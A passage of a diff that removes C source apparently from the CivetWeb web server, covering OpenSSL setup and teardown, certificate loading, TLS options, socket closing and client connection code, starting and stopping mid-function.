-			return 0;
-		}
-	}
-#endif /* NO_SSL_DL */
-
-	if (mg_atomic_inc(&cryptolib_users) > 1) {
-		return 1;
-	}
-
-#else /* not OPENSSL_API_1_1 */
-	int i;
-	size_t size;
-
-	if (ebuf_len > 0) {
-		ebuf[0] = 0;
-	}
-
-#if !defined(NO_SSL_DL)
-	if (!cryptolib_dll_handle) {
-		cryptolib_dll_handle = load_dll(ebuf, ebuf_len, CRYPTO_LIB, crypto_sw);
-		if (!cryptolib_dll_handle) {
-			return 0;
-		}
-	}
-#endif /* NO_SSL_DL */
-
-	if (mg_atomic_inc(&cryptolib_users) > 1) {
-		return 1;
-	}
-
-	/* Initialize locking callbacks, needed for thread safety.
-	 * http://www.openssl.org/support/faq.html#PROG1
-	 */
-	i = CRYPTO_num_locks();
-	if (i < 0) {
-		i = 0;
-	}
-	size = sizeof(pthread_mutex_t) * ((size_t)(i));
-
-	if (size == 0) {
-		ssl_mutexes = NULL;
-	} else if ((ssl_mutexes = (pthread_mutex_t *)mg_malloc(size)) == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s: cannot allocate mutexes: %s",
-		            __func__,
-		            ssl_error());
-
-		return 0;
-	}
-
-	for (i = 0; i < CRYPTO_num_locks(); i++) {
-		pthread_mutex_init(&ssl_mutexes[i], &pthread_mutex_attr);
-	}
-
-	CRYPTO_set_locking_callback(&ssl_locking_callback);
-	CRYPTO_set_id_callback(&mg_current_thread_id);
-#endif /* OPENSSL_API_1_1 */
-
-	return 1;
-}
-
-
-static int
-ssl_use_pem_file(struct mg_context *ctx, const char *pem, const char *chain)
-{
-	if (SSL_CTX_use_certificate_file(ctx->ssl_ctx, pem, 1) == 0) {
-		mg_cry(fc(ctx),
-		       "%s: cannot open certificate file %s: %s",
-		       __func__,
-		       pem,
-		       ssl_error());
-		return 0;
-	}
-
-	/* could use SSL_CTX_set_default_passwd_cb_userdata */
-	if (SSL_CTX_use_PrivateKey_file(ctx->ssl_ctx, pem, 1) == 0) {
-		mg_cry(fc(ctx),
-		       "%s: cannot open private key file %s: %s",
-		       __func__,
-		       pem,
-		       ssl_error());
-		return 0;
-	}
-
-	if (SSL_CTX_check_private_key(ctx->ssl_ctx) == 0) {
-		mg_cry(fc(ctx),
-		       "%s: certificate and private key do not match: %s",
-		       __func__,
-		       pem);
-		return 0;
-	}
-
-	/* In contrast to OpenSSL, wolfSSL does not support certificate
-	 * chain files that contain private keys and certificates in
-	 * SSL_CTX_use_certificate_chain_file.
-	 * The CivetWeb-Server used pem-Files that contained both information.
-	 * In order to make wolfSSL work, it is split in two files.
-	 * One file that contains key and certificate used by the server and
-	 * an optional chain file for the ssl stack.
-	 */
-	if (chain) {
-		if (SSL_CTX_use_certificate_chain_file(ctx->ssl_ctx, chain) == 0) {
-			mg_cry(fc(ctx),
-			       "%s: cannot use certificate chain file %s: %s",
-			       __func__,
-			       pem,
-			       ssl_error());
-			return 0;
-		}
-	}
-	return 1;
-}
-
-
-#ifdef OPENSSL_API_1_1
-static unsigned long
-ssl_get_protocol(int version_id)
-{
-	long unsigned ret = SSL_OP_ALL;
-	if (version_id > 0)
-		ret |= SSL_OP_NO_SSLv2;
-	if (version_id > 1)
-		ret |= SSL_OP_NO_SSLv3;
-	if (version_id > 2)
-		ret |= SSL_OP_NO_TLSv1;
-	if (version_id > 3)
-		ret |= SSL_OP_NO_TLSv1_1;
-	return ret;
-}
-#else
-static long
-ssl_get_protocol(int version_id)
-{
-	long ret = SSL_OP_ALL;
-	if (version_id > 0)
-		ret |= SSL_OP_NO_SSLv2;
-	if (version_id > 1)
-		ret |= SSL_OP_NO_SSLv3;
-	if (version_id > 2)
-		ret |= SSL_OP_NO_TLSv1;
-	if (version_id > 3)
-		ret |= SSL_OP_NO_TLSv1_1;
-	return ret;
-}
-#endif /* OPENSSL_API_1_1 */
-
-
-/* SSL callback documentation:
- * https://www.openssl.org/docs/man1.1.0/ssl/SSL_set_info_callback.html
- * https://linux.die.net/man/3/ssl_set_info_callback */
-static void
-ssl_info_callback(const SSL *ssl, int what, int ret)
-{
-	(void)ret;
-
-	if (what & SSL_CB_HANDSHAKE_START) {
-		SSL_get_app_data(ssl);
-	}
-	if (what & SSL_CB_HANDSHAKE_DONE) {
-		/* TODO: check for openSSL 1.1 */
-		//#define SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS 0x0001
-		// ssl->s3->flags |= SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS;
-	}
-}
-
-
-/* Dynamically load SSL library. Set up ctx->ssl_ctx pointer. */
-static int
-set_ssl_option(struct mg_context *ctx)
-{
-	const char *pem;
-	const char *chain;
-	int callback_ret;
-	int should_verify_peer;
-	int peer_certificate_optional;
-	const char *ca_path;
-	const char *ca_file;
-	int use_default_verify_paths;
-	int verify_depth;
-	time_t now_rt = time(NULL);
-	struct timespec now_mt;
-	md5_byte_t ssl_context_id[16];
-	md5_state_t md5state;
-	int protocol_ver;
-	char ebuf[128];
-
-	/* If PEM file is not specified and the init_ssl callback
-	 * is not specified, skip SSL initialization. */
-	if (!ctx) {
-		return 0;
-	}
-	if ((pem = ctx->config[SSL_CERTIFICATE]) == NULL
-	    && ctx->callbacks.init_ssl == NULL) {
-		return 1;
-	}
-	chain = ctx->config[SSL_CERTIFICATE_CHAIN];
-	if (chain == NULL) {
-		chain = pem;
-	}
-	if ((chain != NULL) && (*chain == 0)) {
-		chain = NULL;
-	}
-
-	if (!initialize_ssl(ebuf, sizeof(ebuf))) {
-		mg_cry(fc(ctx), "%s", ebuf);
-		return 0;
-	}
-
-#if !defined(NO_SSL_DL)
-	if (!ssllib_dll_handle) {
-		ssllib_dll_handle = load_dll(ebuf, sizeof(ebuf), SSL_LIB, ssl_sw);
-		if (!ssllib_dll_handle) {
-			mg_cry(fc(ctx), "%s", ebuf);
-			return 0;
-		}
-	}
-#endif /* NO_SSL_DL */
-
-#ifdef OPENSSL_API_1_1
-	/* Initialize SSL library */
-	OPENSSL_init_ssl(0, NULL);
-	OPENSSL_init_ssl(OPENSSL_INIT_LOAD_SSL_STRINGS
-	                     | OPENSSL_INIT_LOAD_CRYPTO_STRINGS,
-	                 NULL);
-
-	if ((ctx->ssl_ctx = SSL_CTX_new(TLS_server_method())) == NULL) {
-		mg_cry(fc(ctx), "SSL_CTX_new (server) error: %s", ssl_error());
-		return 0;
-	}
-#else
-	/* Initialize SSL library */
-	SSL_library_init();
-	SSL_load_error_strings();
-
-	if ((ctx->ssl_ctx = SSL_CTX_new(SSLv23_server_method())) == NULL) {
-		mg_cry(fc(ctx), "SSL_CTX_new (server) error: %s", ssl_error());
-		return 0;
-	}
-#endif /* OPENSSL_API_1_1 */
-
-	SSL_CTX_clear_options(ctx->ssl_ctx,
-	                      SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | SSL_OP_NO_TLSv1
-	                          | SSL_OP_NO_TLSv1_1);
-	protocol_ver = atoi(ctx->config[SSL_PROTOCOL_VERSION]);
-	SSL_CTX_set_options(ctx->ssl_ctx, ssl_get_protocol(protocol_ver));
-	SSL_CTX_set_options(ctx->ssl_ctx, SSL_OP_SINGLE_DH_USE);
-	SSL_CTX_set_options(ctx->ssl_ctx, SSL_OP_CIPHER_SERVER_PREFERENCE);
-	SSL_CTX_set_options(ctx->ssl_ctx,
-	                    SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION);
-	SSL_CTX_set_options(ctx->ssl_ctx, SSL_OP_NO_COMPRESSION);
-#if !defined(NO_SSL_DL)
-	SSL_CTX_set_ecdh_auto(ctx->ssl_ctx, 1);
-#endif /* NO_SSL_DL */
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wincompatible-pointer-types"
-#endif
-	/* Depending on the OpenSSL version, the callback may be
-	 * 'void (*)(SSL *, int, int)' or 'void (*)(const SSL *, int, int)'
-	 * yielding in an "incompatible-pointer-type" warning for the other
-	 * version. It seems to be "unclear" what is correct:
-	 * https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1147526
-	 * https://www.openssl.org/docs/man1.0.2/ssl/ssl.html
-	 * https://www.openssl.org/docs/man1.1.0/ssl/ssl.html
-	 * https://github.com/openssl/openssl/blob/1d97c8435171a7af575f73c526d79e1ef0ee5960/ssl/ssl.h#L1173
-	 * Disable this warning here.
-	 * Alternative would be a version dependent ssl_info_callback and
-	 * a const-cast to call 'char *SSL_get_app_data(SSL *ssl)' there.
-	 */
-	SSL_CTX_set_info_callback(ctx->ssl_ctx, ssl_info_callback);
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-	/* If a callback has been specified, call it. */
-	callback_ret =
-	    (ctx->callbacks.init_ssl == NULL)
-	        ? 0
-	        : (ctx->callbacks.init_ssl(ctx->ssl_ctx, ctx->user_data));
-
-	/* If callback returns 0, civetweb sets up the SSL certificate.
-	 * If it returns 1, civetweb assumes the calback already did this.
-	 * If it returns -1, initializing ssl fails. */
-	if (callback_ret < 0) {
-		mg_cry(fc(ctx), "SSL callback returned error: %i", callback_ret);
-		return 0;
-	}
-	if (callback_ret > 0) {
-		if (pem != NULL) {
-			(void)SSL_CTX_use_certificate_chain_file(ctx->ssl_ctx, pem);
-		}
-		return 1;
-	}
-
-	/* Use some UID as session context ID. */
-	md5_init(&md5state);
-	md5_append(&md5state, (const md5_byte_t *)&now_rt, sizeof(now_rt));
-	clock_gettime(CLOCK_MONOTONIC, &now_mt);
-	md5_append(&md5state, (const md5_byte_t *)&now_mt, sizeof(now_mt));
-	md5_append(&md5state,
-	           (const md5_byte_t *)ctx->config[LISTENING_PORTS],
-	           strlen(ctx->config[LISTENING_PORTS]));
-	md5_append(&md5state, (const md5_byte_t *)ctx, sizeof(*ctx));
-	md5_finish(&md5state, ssl_context_id);
-
-	SSL_CTX_set_session_id_context(ctx->ssl_ctx,
-	                               (const unsigned char *)&ssl_context_id,
-	                               sizeof(ssl_context_id));
-
-	if (pem != NULL) {
-		if (!ssl_use_pem_file(ctx, pem, chain)) {
-			return 0;
-		}
-	}
-
-	/* Should we support client certificates? */
-	/* Default is "no". */
-	should_verify_peer = 0;
-	peer_certificate_optional = 0;
-	if (ctx->config[SSL_DO_VERIFY_PEER] != NULL) {
-		if (mg_strcasecmp(ctx->config[SSL_DO_VERIFY_PEER], "yes") == 0) {
-			/* Yes, they are mandatory */
-			should_verify_peer = 1;
-			peer_certificate_optional = 0;
-		} else if (mg_strcasecmp(ctx->config[SSL_DO_VERIFY_PEER], "optional")
-		           == 0) {
-			/* Yes, they are optional */
-			should_verify_peer = 1;
-			peer_certificate_optional = 1;
-		}
-	}
-
-	use_default_verify_paths =
-	    (ctx->config[SSL_DEFAULT_VERIFY_PATHS] != NULL)
-	    && (mg_strcasecmp(ctx->config[SSL_DEFAULT_VERIFY_PATHS], "yes") == 0);
-
-	if (should_verify_peer) {
-		ca_path = ctx->config[SSL_CA_PATH];
-		ca_file = ctx->config[SSL_CA_FILE];
-		if (SSL_CTX_load_verify_locations(ctx->ssl_ctx, ca_file, ca_path)
-		    != 1) {
-			mg_cry(fc(ctx),
-			       "SSL_CTX_load_verify_locations error: %s "
-			       "ssl_verify_peer requires setting "
-			       "either ssl_ca_path or ssl_ca_file. Is any of them "
-			       "present in "
-			       "the .conf file?",
-			       ssl_error());
-			return 0;
-		}
-
-		if (peer_certificate_optional) {
-			SSL_CTX_set_verify(ctx->ssl_ctx, SSL_VERIFY_PEER, NULL);
-		} else {
-			SSL_CTX_set_verify(ctx->ssl_ctx,
-			                   SSL_VERIFY_PEER
-			                       | SSL_VERIFY_FAIL_IF_NO_PEER_CERT,
-			                   NULL);
-		}
-
-		if (use_default_verify_paths
-		    && (SSL_CTX_set_default_verify_paths(ctx->ssl_ctx) != 1)) {
-			mg_cry(fc(ctx),
-			       "SSL_CTX_set_default_verify_paths error: %s",
-			       ssl_error());
-			return 0;
-		}
-
-		if (ctx->config[SSL_VERIFY_DEPTH]) {
-			verify_depth = atoi(ctx->config[SSL_VERIFY_DEPTH]);
-			SSL_CTX_set_verify_depth(ctx->ssl_ctx, verify_depth);
-		}
-	}
-
-	if (ctx->config[SSL_CIPHER_LIST] != NULL) {
-		if (SSL_CTX_set_cipher_list(ctx->ssl_ctx, ctx->config[SSL_CIPHER_LIST])
-		    != 1) {
-			mg_cry(fc(ctx), "SSL_CTX_set_cipher_list error: %s", ssl_error());
-		}
-	}
-
-	return 1;
-}
-
-
-static void
-uninitialize_ssl(void)
-{
-#ifdef OPENSSL_API_1_1
-
-	if (mg_atomic_dec(&cryptolib_users) == 0) {
-
-		/* Shutdown according to
-		 * https://wiki.openssl.org/index.php/Library_Initialization#Cleanup
-		 * http://stackoverflow.com/questions/29845527/how-to-properly-uninitialize-openssl
-		 */
-		CONF_modules_unload(1);
-#else
-	int i;
-
-	if (mg_atomic_dec(&cryptolib_users) == 0) {
-
-		/* Shutdown according to
-		 * https://wiki.openssl.org/index.php/Library_Initialization#Cleanup
-		 * http://stackoverflow.com/questions/29845527/how-to-properly-uninitialize-openssl
-		 */
-		CRYPTO_set_locking_callback(NULL);
-		CRYPTO_set_id_callback(NULL);
-		ENGINE_cleanup();
-		CONF_modules_unload(1);
-		ERR_free_strings();
-		EVP_cleanup();
-		CRYPTO_cleanup_all_ex_data();
-		ERR_remove_state(0);
-
-		for (i = 0; i < CRYPTO_num_locks(); i++) {
-			pthread_mutex_destroy(&ssl_mutexes[i]);
-		}
-		mg_free(ssl_mutexes);
-		ssl_mutexes = NULL;
-#endif /* OPENSSL_API_1_1 */
-	}
-}
-#endif /* !NO_SSL */
-
-
-static int
-set_gpass_option(struct mg_context *ctx)
-{
-	if (ctx) {
-		struct mg_file file = STRUCT_FILE_INITIALIZER;
-		const char *path = ctx->config[GLOBAL_PASSWORDS_FILE];
-		if ((path != NULL) && !mg_stat(fc(ctx), path, &file.stat)) {
-			mg_cry(fc(ctx), "Cannot open %s: %s", path, strerror(ERRNO));
-			return 0;
-		}
-		return 1;
-	}
-	return 0;
-}
-
-
-static int
-set_acl_option(struct mg_context *ctx)
-{
-	return check_acl(ctx, (uint32_t)0x7f000001UL) != -1;
-}
-
-
-static void
-reset_per_request_attributes(struct mg_connection *conn)
-{
-	if (!conn) {
-		return;
-	}
-	conn->connection_type =
-	    CONNECTION_TYPE_INVALID; /* Not yet a valid request/response */
-
-	conn->num_bytes_sent = conn->consumed_content = 0;
-
-	conn->path_info = NULL;
-	conn->status_code = -1;
-	conn->content_len = -1;
-	conn->is_chunked = 0;
-	conn->must_close = 0;
-	conn->request_len = 0;
-	conn->throttle = 0;
-	conn->data_len = 0;
-	conn->chunk_remainder = 0;
-	conn->accept_gzip = 0;
-
-	conn->response_info.content_length = conn->request_info.content_length = -1;
-	conn->response_info.http_version = conn->request_info.http_version = NULL;
-	conn->response_info.num_headers = conn->request_info.num_headers = 0;
-	conn->response_info.status_text = NULL;
-	conn->response_info.status_code = 0;
-
-	conn->request_info.remote_user = NULL;
-	conn->request_info.request_method = NULL;
-	conn->request_info.request_uri = NULL;
-	conn->request_info.local_uri = NULL;
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* Legacy before split into local_uri and request_uri */
-	conn->request_info.uri = NULL;
-#endif
-}
-
-
-#if 0
-/* Note: set_sock_timeout is not required for non-blocking sockets.
- * Leave this function here (commented out) for reference until
- * CivetWeb 1.9 is tested, and the tests confirme this function is
- * no longer required.
-*/
-static int
-set_sock_timeout(SOCKET sock, int milliseconds)
-{
-        int r0 = 0, r1, r2;
-
-#ifdef _WIN32
-        /* Windows specific */
-
-        DWORD tv = (DWORD)milliseconds;
-
-#else
-        /* Linux, ... (not Windows) */
-
-        struct timeval tv;
-
-/* TCP_USER_TIMEOUT/RFC5482 (http://tools.ietf.org/html/rfc5482):
- * max. time waiting for the acknowledged of TCP data before the connection
- * will be forcefully closed and ETIMEDOUT is returned to the application.
- * If this option is not set, the default timeout of 20-30 minutes is used.
-*/
-/* #define TCP_USER_TIMEOUT (18) */
-
-#if defined(TCP_USER_TIMEOUT)
-        unsigned int uto = (unsigned int)milliseconds;
-        r0 = setsockopt(sock, 6, TCP_USER_TIMEOUT, (const void *)&uto, sizeof(uto));
-#endif
-
-        memset(&tv, 0, sizeof(tv));
-        tv.tv_sec = milliseconds / 1000;
-        tv.tv_usec = (milliseconds * 1000) % 1000000;
-
-#endif /* _WIN32 */
-
-        r1 = setsockopt(
-            sock, SOL_SOCKET, SO_RCVTIMEO, (SOCK_OPT_TYPE)&tv, sizeof(tv));
-        r2 = setsockopt(
-            sock, SOL_SOCKET, SO_SNDTIMEO, (SOCK_OPT_TYPE)&tv, sizeof(tv));
-
-        return r0 || r1 || r2;
-}
-#endif
-
-
-static int
-set_tcp_nodelay(SOCKET sock, int nodelay_on)
-{
-	if (setsockopt(sock,
-	               IPPROTO_TCP,
-	               TCP_NODELAY,
-	               (SOCK_OPT_TYPE)&nodelay_on,
-	               sizeof(nodelay_on)) != 0) {
-		/* Error */
-		return 1;
-	}
-	/* OK */
-	return 0;
-}
-
-
-static void
-close_socket_gracefully(struct mg_connection *conn)
-{
-#if defined(_WIN32)
-	char buf[MG_BUF_LEN];
-	int n;
-#endif
-	struct linger linger;
-	int error_code = 0;
-	int linger_timeout = -2;
-	socklen_t opt_len = sizeof(error_code);
-
-	if (!conn) {
-		return;
-	}
-
-	/* http://msdn.microsoft.com/en-us/library/ms739165(v=vs.85).aspx:
-	 * "Note that enabling a nonzero timeout on a nonblocking socket
-	 * is not recommended.", so set it to blocking now */
-	set_blocking_mode(conn->client.sock);
-
-	/* Send FIN to the client */
-	shutdown(conn->client.sock, SHUTDOWN_WR);
-
-
-#if defined(_WIN32)
-	/* Read and discard pending incoming data. If we do not do that and
-	 * close
-	 * the socket, the data in the send buffer may be discarded. This
-	 * behaviour is seen on Windows, when client keeps sending data
-	 * when server decides to close the connection; then when client
-	 * does recv() it gets no data back. */
-	do {
-		n = pull_inner(NULL, conn, buf, sizeof(buf), /* Timeout in s: */ 1.0);
-	} while (n > 0);
-#endif
-
-	if (conn->ctx->config[LINGER_TIMEOUT]) {
-		linger_timeout = atoi(conn->ctx->config[LINGER_TIMEOUT]);
-	}
-
-	/* Set linger option according to configuration */
-	if (linger_timeout >= 0) {
-		/* Set linger option to avoid socket hanging out after close. This
-		 * prevent ephemeral port exhaust problem under high QPS. */
-		linger.l_onoff = 1;
-
-#if defined(_MSC_VER)
-#pragma warning(push)
-#pragma warning(disable : 4244)
-#endif
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wconversion"
-#endif
-		/* Data type of linger structure elements may differ,
-		 * so we don't know what cast we need here.
-		 * Disable type conversion warnings. */
-
-		linger.l_linger = (linger_timeout + 999) / 1000;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-#if defined(_MSC_VER)
-#pragma warning(pop)
-#endif
-
-	} else {
-		linger.l_onoff = 0;
-		linger.l_linger = 0;
-	}
-
-	if (linger_timeout < -1) {
-		/* Default: don't configure any linger */
-	} else if (getsockopt(conn->client.sock,
-	                      SOL_SOCKET,
-	                      SO_ERROR,
-	                      (char *)&error_code,
-	                      &opt_len) != 0) {
-		/* Cannot determine if socket is already closed. This should
-		 * not occur and never did in a test. Log an error message
-		 * and continue. */
-		mg_cry(conn,
-		       "%s: getsockopt(SOL_SOCKET SO_ERROR) failed: %s",
-		       __func__,
-		       strerror(ERRNO));
-	} else if (error_code == ECONNRESET) {
-		/* Socket already closed by client/peer, close socket without linger
-		 */
-	} else {
-
-		/* Set linger timeout */
-		if (setsockopt(conn->client.sock,
-		               SOL_SOCKET,
-		               SO_LINGER,
-		               (char *)&linger,
-		               sizeof(linger)) != 0) {
-			mg_cry(conn,
-			       "%s: setsockopt(SOL_SOCKET SO_LINGER(%i,%i)) failed: %s",
-			       __func__,
-			       linger.l_onoff,
-			       linger.l_linger,
-			       strerror(ERRNO));
-		}
-	}
-
-	/* Now we know that our FIN is ACK-ed, safe to close */
-	closesocket(conn->client.sock);
-	conn->client.sock = INVALID_SOCKET;
-}
-
-
-static void
-close_connection(struct mg_connection *conn)
-{
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 6; /* to close */
-#endif
-
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	if (conn->lua_websocket_state) {
-		lua_websocket_close(conn, conn->lua_websocket_state);
-		conn->lua_websocket_state = NULL;
-	}
-#endif
-
-	mg_lock_connection(conn);
-
-	/* Set close flag, so keep-alive loops will stop */
-	conn->must_close = 1;
-
-	/* call the connection_close callback if assigned */
-	if (conn->ctx->callbacks.connection_close != NULL) {
-		if (conn->ctx->context_type == CONTEXT_SERVER) {
-			conn->ctx->callbacks.connection_close(conn);
-		}
-	}
-
-	/* Reset user data, after close callback is called.
-	 * Do not reuse it. If the user needs a destructor,
-	 * it must be done in the connection_close callback. */
-	mg_set_user_connection_data(conn, NULL);
-
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 7; /* closing */
-#endif
-
-#ifndef NO_SSL
-	if (conn->ssl != NULL) {
-		/* Run SSL_shutdown twice to ensure completly close SSL connection
-		 */
-		SSL_shutdown(conn->ssl);
-		SSL_free(conn->ssl);
-/* Avoid CRYPTO_cleanup_all_ex_data(); See discussion:
- * https://wiki.openssl.org/index.php/Talk:Library_Initialization */
-#ifndef OPENSSL_API_1_1
-		ERR_remove_state(0);
-#endif
-		conn->ssl = NULL;
-	}
-#endif
-	if (conn->client.sock != INVALID_SOCKET) {
-		close_socket_gracefully(conn);
-		conn->client.sock = INVALID_SOCKET;
-	}
-
-	mg_unlock_connection(conn);
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 8; /* closed */
-#endif
-}
-
-
-void
-mg_close_connection(struct mg_connection *conn)
-{
-#if defined(USE_WEBSOCKET)
-	struct mg_context *client_ctx = NULL;
-#endif /* defined(USE_WEBSOCKET) */
-
-	if ((conn == NULL) || (conn->ctx == NULL)) {
-		return;
-	}
-
-#if defined(USE_WEBSOCKET)
-	if (conn->ctx->context_type == CONTEXT_SERVER) {
-		if (conn->in_websocket_handling) {
-			/* Set close flag, so the server thread can exit. */
-			conn->must_close = 1;
-			return;
-		}
-	}
-	if (conn->ctx->context_type == CONTEXT_WS_CLIENT) {
-
-		unsigned int i;
-
-		/* ws/wss client */
-		client_ctx = conn->ctx;
-
-		/* client context: loops must end */
-		conn->ctx->stop_flag = 1;
-		conn->must_close = 1;
-
-		/* We need to get the client thread out of the select/recv call
-		 * here. */
-		/* Since we use a sleep quantum of some seconds to check for recv
-		 * timeouts, we will just wait a few seconds in mg_join_thread. */
-
-		/* join worker thread */
-		for (i = 0; i < client_ctx->cfg_worker_threads; i++) {
-			if (client_ctx->worker_threadids[i] != 0) {
-				mg_join_thread(client_ctx->worker_threadids[i]);
-			}
-		}
-	}
-#endif /* defined(USE_WEBSOCKET) */
-
-	close_connection(conn);
-
-#ifndef NO_SSL
-	if (conn->client_ssl_ctx != NULL) {
-		SSL_CTX_free((SSL_CTX *)conn->client_ssl_ctx);
-	}
-#endif
-
-#if defined(USE_WEBSOCKET)
-	if (client_ctx != NULL) {
-		/* free context */
-		mg_free(client_ctx->worker_threadids);
-		mg_free(client_ctx);
-		(void)pthread_mutex_destroy(&conn->mutex);
-		mg_free(conn);
-	} else if (conn->ctx->context_type == CONTEXT_HTTP_CLIENT) {
-		mg_free(conn);
-	}
-#else
-	if (conn->ctx->context_type == CONTEXT_HTTP_CLIENT) { /* Client */
-		mg_free(conn);
-	}
-#endif /* defined(USE_WEBSOCKET) */
-}
-
-
-/* Only for memory statistics */
-static struct mg_context common_client_context;
-
-
-static struct mg_connection *
-mg_connect_client_impl(const struct mg_client_options *client_options,
-                       int use_ssl,
-                       char *ebuf,
-                       size_t ebuf_len)
-{
-	struct mg_connection *conn = NULL;
-	SOCKET sock;
-	union usa sa;
-	struct sockaddr *psa;
-	socklen_t len;
-
-	unsigned max_req_size =
-	    (unsigned)atoi(config_options[MAX_REQUEST_SIZE].default_value);
-
-	/* Size of structures, aligned to 8 bytes */
-	size_t conn_size = ((sizeof(struct mg_connection) + 7) >> 3) << 3;
-	size_t ctx_size = ((sizeof(struct mg_context) + 7) >> 3) << 3;
-
-	conn = (struct mg_connection *)mg_calloc_ctx(1,
-	                                             conn_size + ctx_size
-	                                                 + max_req_size,
-	                                             &common_client_context);
-
-	if (conn == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "calloc(): %s",
-		            strerror(ERRNO));
-		return NULL;
-	}
-
-	conn->ctx = (struct mg_context *)(((char *)conn) + conn_size);
-	conn->buf = (((char *)conn) + conn_size + ctx_size);
-	conn->buf_size = (int)max_req_size;
-	conn->ctx->context_type = CONTEXT_HTTP_CLIENT;
-
-	if (!connect_socket(&common_client_context,
-	                    client_options->host,
-	                    client_options->port,
-	                    use_ssl,
-	                    ebuf,
-	                    ebuf_len,
-	                    &sock,
-	                    &sa)) {
-		/* ebuf is set by connect_socket,
-		 * free all memory and return NULL; */
-		mg_free(conn);
-		return NULL;
-	}
-
-#ifndef NO_SSL
-#ifdef OPENSSL_API_1_1
-	if (use_ssl
-	    && (conn->client_ssl_ctx = SSL_CTX_new(TLS_client_method())) == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "SSL_CTX_new error");
-		closesocket(sock);
-		mg_free(conn);
-		return NULL;
-	}
-#else
-	if (use_ssl
-	    && (conn->client_ssl_ctx = SSL_CTX_new(SSLv23_client_method()))
-	           == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "SSL_CTX_new error");
-		closesocket(sock);
-		mg_free(conn);
-		return NULL;
-	}
-#endif /* OPENSSL_API_1_1 */
-#endif /* NO_SSL */
-
-
-#ifdef USE_IPV6
-	len = (sa.sa.sa_family == AF_INET) ? sizeof(conn->client.rsa.sin)
-	                                   : sizeof(conn->client.rsa.sin6);
-	psa = (sa.sa.sa_family == AF_INET)
-	          ? (struct sockaddr *)&(conn->client.rsa.sin)
-	          : (struct sockaddr *)&(conn->client.rsa.sin6);
-#else
-	len = sizeof(conn->client.rsa.sin);
-	psa = (struct sockaddr *)&(conn->client.rsa.sin);
-#endif
-
-	conn->client.sock = sock;
-	conn->client.lsa = sa;
-
-	if (getsockname(sock, psa, &len) != 0) {
-		mg_cry(conn, "%s: getsockname() failed: %s", __func__, strerror(ERRNO));
-	}
-
-	conn->client.is_ssl = use_ssl ? 1 : 0;
-	(void)pthread_mutex_init(&conn->mutex, &pthread_mutex_attr);
-
-#ifndef NO_SSL
-	if (use_ssl) {
-		common_client_context.ssl_ctx = conn->client_ssl_ctx;
-
-		/* TODO: Check ssl_verify_peer and ssl_ca_path here.
-		 * SSL_CTX_set_verify call is needed to switch off server
-		 * certificate checking, which is off by default in OpenSSL and
-		 * on in yaSSL. */
-		/* TODO: SSL_CTX_set_verify(conn->client_ssl_ctx,
-		 * SSL_VERIFY_PEER, verify_ssl_server); */
-
-		if (client_options->client_cert) {
-			if (!ssl_use_pem_file(&common_client_context,
-			                      client_options->client_cert,
-			                      NULL)) {
-				mg_snprintf(NULL,
-				            NULL, /* No truncation check for ebuf */
-				            ebuf,
-				            ebuf_len,
-				            "Can not use SSL client certificate");
-				SSL_CTX_free(conn->client_ssl_ctx);
-				closesocket(sock);
-				mg_free(conn);
-				return NULL;
-			}
-		}
-
-		if (client_options->server_cert) {
-			SSL_CTX_load_verify_locations(conn->client_ssl_ctx,
-			                              client_options->server_cert,
-			                              NULL);
-			SSL_CTX_set_verify(conn->client_ssl_ctx, SSL_VERIFY_PEER, NULL);
-		} else {
-			SSL_CTX_set_verify(conn->client_ssl_ctx, SSL_VERIFY_NONE, NULL);
-		}
-
-		if (!sslize(conn,
-		            conn->client_ssl_ctx,
-		            SSL_connect,
-		            &(conn->ctx->stop_flag))) {
-			mg_snprintf(NULL,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "SSL connection error");
-			SSL_CTX_free(conn->client_ssl_ctx);
-			closesocket(sock);
-			mg_free(conn);
-			return NULL;
-		}
-	}
-#endif
-
-	if (0 != set_non_blocking_mode(sock)) {
-		/* TODO: handle error */
-		;
-	}
-
-	return conn;
-}
-
-
-CIVETWEB_API struct mg_connection *
-mg_connect_client_secure(const struct mg_client_options *client_options,
-                         char *error_buffer,
-                         size_t error_buffer_size)
-{
-	return mg_connect_client_impl(client_options,
-	                              1,
-	                              error_buffer,
-	                              error_buffer_size);
-}
-
-
-struct mg_connection *
-mg_connect_client(const char *host,
-                  int port,
-                  int use_ssl,
-                  char *error_buffer,
-                  size_t error_buffer_size)
-{
-	struct mg_client_options opts;
-	memset(&opts, 0, sizeof(opts));
-	opts.host = host;
-	opts.port = port;
-	return mg_connect_client_impl(&opts,
-	                              use_ssl,
-	                              error_buffer,
-	                              error_buffer_size);
-}
-
-
-static const struct {
-	const char *proto;
-	size_t proto_len;
-	unsigned default_port;
-} abs_uri_protocols[] = {{"http://", 7, 80},
-                         {"https://", 8, 443},
-                         {"ws://", 5, 80},
-                         {"wss://", 6, 443},
-                         {NULL, 0, 0}};
-
-
-/* Check if the uri is valid.
- * return 0 for invalid uri,
- * return 1 for *,
- * return 2 for relative uri,
- * return 3 for absolute uri without port,
- * return 4 for absolute uri with port */
-static int
-get_uri_type(const char *uri)
-{
-	int i;
-	const char *hostend, *portbegin;
-	char *portend;
-	unsigned long port;
